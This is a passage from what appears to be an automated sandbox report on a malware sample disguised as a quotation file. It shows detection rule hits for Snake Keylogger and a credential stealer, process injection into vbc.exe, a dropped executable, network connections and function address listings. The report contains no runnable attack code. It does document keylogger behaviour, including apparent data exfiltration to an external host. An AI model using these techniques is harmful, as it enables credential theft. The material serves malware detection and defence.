0000000D.00000002.3549205458.0000000006C18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 54598
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 61943
                Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 54598 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 61943 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:54598 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.11:61943 version: TLS 1.2

                System Summary

                barindex
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.QUOTATION 03664710859027.exe.4116db8.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000008.00000002.3545341483.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.1116689822.00000000040A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: QUOTATION 03664710859027.exe PID: 7584, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: Process Memory Space: vbc.exe PID: 7980, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
                Source: initial sampleStatic PE information: Filename: QUOTATION 03664710859027.exe
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_014D3E400_2_014D3E40
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_014D6F990_2_014D6F99
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_014DD87C0_2_014DD87C
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_0773B3DD0_2_0773B3DD
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_077336180_2_07733618
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_077352500_2_07735250
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_0773524F0_2_0773524F
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_077331E00_2_077331E0
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07734E180_2_07734E18
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07734E070_2_07734E07
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07735C000_2_07735C00
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_0773CAF80_2_0773CAF8
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FD24A80_2_07FD24A8
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FDCFB00_2_07FDCFB0
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FD26400_2_07FD2640
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FD26300_2_07FD2630
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FDD5180_2_07FDD518
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FDCA000_2_07FDCA00
                Source: C:\Users\user\Desktop\QUOTATION 03664710859027.exeCode function: 0_2_07FDC9F00_2_07FDC9F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570C4708_2_0570C470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570C7528_2_0570C752
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_057067308_2_05706730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570C1908_2_0570C190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570F0078_2_0570F007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570B3288_2_0570B328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570BEB08_2_0570BEB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_057098588_2_05709858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570BBD28_2_0570BBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570CA328_2_0570CA32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_05704AD98_2_05704AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_057035728_2_05703572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570E5288_2_0570E528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570E5178_2_0570E517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570B4F28_2_0570B4F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0570215C8_2_0570215C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC182B88_2_0AC182B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1B3988_2_0AC1B398
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1D3208_2_0AC1D320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1A0B88_2_0AC1A0B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC188088_2_0AC18808
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1C0388_2_0AC1C038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1B9E88_2_0AC1B9E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC111A08_2_0AC111A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC171588_2_0AC17158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1C6888_2_0AC1C688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1EF418_2_0AC1EF41
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1A7088_2_0AC1A708
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1CCD88_2_0AC1CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1AD508_2_0AC1AD50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC152C88_2_0AC152C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC182AA8_2_0AC182AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC152BA8_2_0AC152BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC17A088_2_0AC17A08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC133E08_2_0AC133E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1B3878_2_0AC1B387
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC15B698_2_0AC15B69
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC15B788_2_0AC15B78
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1D30F8_2_0AC1D30F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC140E08_2_0AC140E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC108E08_2_0AC108E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC108F08_2_0AC108F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC168808_2_0AC16880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1A0A78_2_0AC1A0A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC100408_2_0AC10040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC168708_2_0AC16870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC100078_2_0AC10007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC128078_2_0AC12807
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC128188_2_0AC12818
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1C0298_2_0AC1C029
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1B9E08_2_0AC1B9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC179F88_2_0AC179F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC171488_2_0AC17148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1A6FB8_2_0AC1A6FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC14E488_2_0AC14E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC17E518_2_0AC17E51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC17E608_2_0AC17E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1C6788_2_0AC1C678
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC14E3A8_2_0AC14E3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC15FC08_2_0AC15FC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC15FD08_2_0AC15FD0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC157108_2_0AC15710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC157208_2_0AC15720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1CCC88_2_0AC1CCC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC16CF18_2_0AC16CF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC104888_2_0AC10488
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC104988_2_0AC10498
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC164198_2_0AC16419
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC164288_2_0AC16428
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC175A08_2_0AC175A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC175B08_2_0AC175B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC1AD408_2_0AC1AD40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC10D488_2_0AC10D48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC16D008_2_0AC16D00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 8_2_0AC10D398_2_0AC10D39
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_01473E409_2_01473E40
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_01476F939_2_01476F93
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_0147D87C9_2_0147D87C
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076BA5809_2_076BA580
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B36189_2_076B3618
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B524E9_2_076B524E
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B52509_2_076B5250
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B31E09_2_076B31E0
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B4E189_2_076B4E18
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076BBD989_2_076BBD98
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_076B5C009_2_076B5C00
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_077426409_2_07742640
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_0774CFB09_2_0774CFB0
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_077426309_2_07742630
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_0774CA009_2_0774CA00
                Source: C:\Users\user\AppData\Roaming\IEGkgGtnYpDN.exeCode function: 9_2_0774C9F09_2_0774C9F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECC47013_2_04ECC470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECC75213_2_04ECC752
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECF00713_2_04ECF007
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECC19013_2_04ECC190
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04EC610813_2_04EC6108
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECB32813_2_04ECB328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECBEB213_2_04ECBEB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04EC688013_2_04EC6880
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04EC985813_2_04EC9858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04EC4AD913_2_04EC4AD9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECCA3213_2_04ECCA32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECBBD213_2_04ECBBD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECB4F213_2_04ECB4F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04EC357213_2_04EC3572
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECE52813_2_04ECE528
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_04ECE51713_2_04ECE517
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947846013_2_09478460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947387013_2_09473870
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09477B7013_2_09477B70
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947B94013_2_0947B940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09470D5113_2_09470D51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947ED5013_2_0947ED50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09470D6013_2_09470D60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947ED6013_2_0947ED60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947090013_2_09470900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947E90813_2_0947E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947B93613_2_0947B936
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_094711C013_2_094711C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947C1E013_2_0947C1E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947C1F013_2_0947C1F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947BD8813_2_0947BD88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_09477D9013_2_09477D90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947BD9813_2_0947BD98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947F1A913_2_0947F1A9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_094711B013_2_094711B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947F1B813_2_0947F1B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947004013_2_09470040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947E04913_2_0947E049
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947E05813_2_0947E058
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947386013_2_09473860
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947DC0013_2_0947DC00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947001A13_2_0947001A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947B4D713_2_0947B4D7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947B4E813_2_0947B4E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_094708F013_2_094708F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947E8F813_2_0947E8F8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947049013_2_09470490
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_094704A013_2_094704A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947E4A013_2_0947E4A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947E4B013_2_0947E4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947D34013_2_0947D340
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947D35013_2_0947D350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_094773E813_2_094773E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947DBF113_2_0947DBF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947D79813_2_0947D798
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947D7A813_2_0947D7A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947C64813_2_0947C648
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947FA5913_2_0947FA59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947FA6813_2_0947FA68
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947F60013_2_0947F600
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947F61013_2_0947F610
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947C63813_2_0947C638
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947CEEA13_2_0947CEEA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947CEF813_2_0947CEF8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947CA9013_2_0947CA90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0947CAA013_2_0947CAA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D82B813_2_0A3D82B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DC68813_2_0A3DC688
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DD32013_2_0A3DD320
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DEF1E13_2_0A3DEF1E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DA70813_2_0A3DA708
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DB39813_2_0A3DB398
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DC03813_2_0A3DC038
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D880813_2_0A3D8808
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DA0B813_2_0A3DA0B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DCCD813_2_0A3DCCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D715813_2_0A3D7158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DAD5013_2_0A3DAD50
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D11A013_2_0A3D11A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DB9E813_2_0A3DB9E8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D4E3A13_2_0A3D4E3A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D7A0813_2_0A3D7A08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DC67813_2_0A3DC678
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D7E6013_2_0A3D7E60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D7E5113_2_0A3D7E51
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D4E4813_2_0A3D4E48
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D52B813_2_0A3D52B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D82AA13_2_0A3D82AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3DA6FA13_2_0A3DA6FA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D52C813_2_0A3D52C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 13_2_0A3D572013_2_0A3D5720
